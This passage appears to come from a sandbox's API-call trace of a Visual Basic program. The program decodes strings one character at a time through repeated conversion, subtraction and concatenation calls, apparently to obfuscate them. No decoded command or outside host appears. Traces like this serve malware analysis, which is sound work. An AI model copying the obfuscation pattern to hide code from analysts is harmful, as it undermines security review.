lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.287] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0169.288] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.288] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0169.288] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.289] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0169.289] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.290] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0169.290] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.291] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0169.291] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.295] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0169.295] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.296] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0169.296] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.297] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0169.297] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.297] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0169.298] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.298] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0169.299] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.299] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0169.299] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="S", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.300] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0169.300] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.301] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0169.301] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.302] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0169.302] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.303] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0169.303] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.303] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0169.304] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.304] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0169.304] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.305] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0169.305] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.306] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0169.306] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="b\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.306] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0169.321] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.322] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0169.322] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.438] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0169.439] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.439] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0169.439] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.440] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0169.440] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.441] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0169.441] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.442] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0169.442] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.442] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0169.443] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.443] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0169.443] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.444] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0169.444] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.445] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0169.445] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.446] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0169.446] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.446] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0169.447] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.452] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0169.452] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="E", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.453] VarAdd (in: pvarLeft=0x28f9a0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1168434, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0169.453] VarCat (in: pvarLeft=0x28fa40, pvarRight=0x28f9b0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.454] VarAdd (in: pvarLeft=0x28f9a0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x116845c, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0169.454] VarCat (in: pvarLeft=0x28fa40, pvarRight=0x28f9b0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.455] VarAdd (in: pvarLeft=0x28f9a0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="G", cbMultiByte=1, lpWideCharStr=0x11683e4, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0169.455] VarCat (in: pvarLeft=0x28fa40, pvarRight=0x28f9b0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.455] VarAdd (in: pvarLeft=0x28f9a0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x1168434, cchWideChar=1 | out: lpWideCharStr="_") returned 1 